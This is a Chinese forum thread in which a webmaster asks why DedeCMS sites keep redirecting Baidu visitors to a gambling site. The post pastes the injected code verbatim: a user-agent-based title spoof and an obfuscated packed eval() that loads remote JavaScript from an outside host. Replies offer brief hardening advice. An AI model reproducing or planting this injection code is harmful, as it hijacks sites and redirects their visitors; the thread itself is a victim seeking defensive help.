网站被挂马了怎么办,已经删除疑似木马文件还是出现跳转情况 求大佬 悬赏1元 已结束
织梦程序做的站 最新版的织梦 该打的补丁也打了。 360网站安全检测也没问题全绿
现在情况是一到晚上 百度搜索点击网站打开直接跳转到一个菠菜网站。但是我直接输入域名的话没事。 我在后台更新下主页 这个问题就没了。。
我也查了网站程序文件 近期修改的文件 有几个疑似病毒文件PHP后缀的我也删掉了 但是现在还是反复出现跳转页面。。
右键查看源代码 头部多了以下木马代码:(但是我查源码里面又没有这些网页上多出来的代码。)
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="智能中国网_国内领先的AI智能科技门户"}</script>
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\n\\b\\1\\e\\j\\7\\o\\0"]["\\l\\3\\8\\0\\7"](\'\\i\\2\\1\\3\\8\\4\\0 \\0\\k\\4\\7\\d\\6\\0\\7\\s\\0\\5\\f\\c\\t\\c\\2\\1\\3\\8\\4\\0\\6 \\2\\3\\1\\d\\6\\9\\0\\0\\4\\2\\p\\5\\5\\2\\a\\9\\e\\a\\9\\r\\g\\1\\b\\j\\5\\k\\q\\1\\g\\f\\2\\6\\h\\i\\5\\2\\1\\3\\8\\4\\0\\h\');',30,30,'x74|x63|x73|x72|x70|x2f|x22|x65|x69|x68|x66|x6f|x61|x3d|x75|x6a|x2e|x3e|x3c|x6d|x79|x77|window|x64|x6e|x3a|x6c|x32|x78|x76'.split('|'),0,{}))
</script>
这应该是XSS攻击 我同一个服务器上放了10个站 有6个出现这种一样的情况 这是服务器被挂马还是网站挂马?求大佬告诉怎么解决
被挂马了,感觉好危险啊
刚刚在另外一个问题回复过了,织梦的站,建议不使用的模块都卸载,服务器建议安装一个云锁,如果网站不经常更新,建议直接把写入修改的权限都锁死,需要修改的时候在开放。
慢慢排查吧,我也不会,祝你好运····
可能有后门吧,具体情况得排查,反正有点烦,
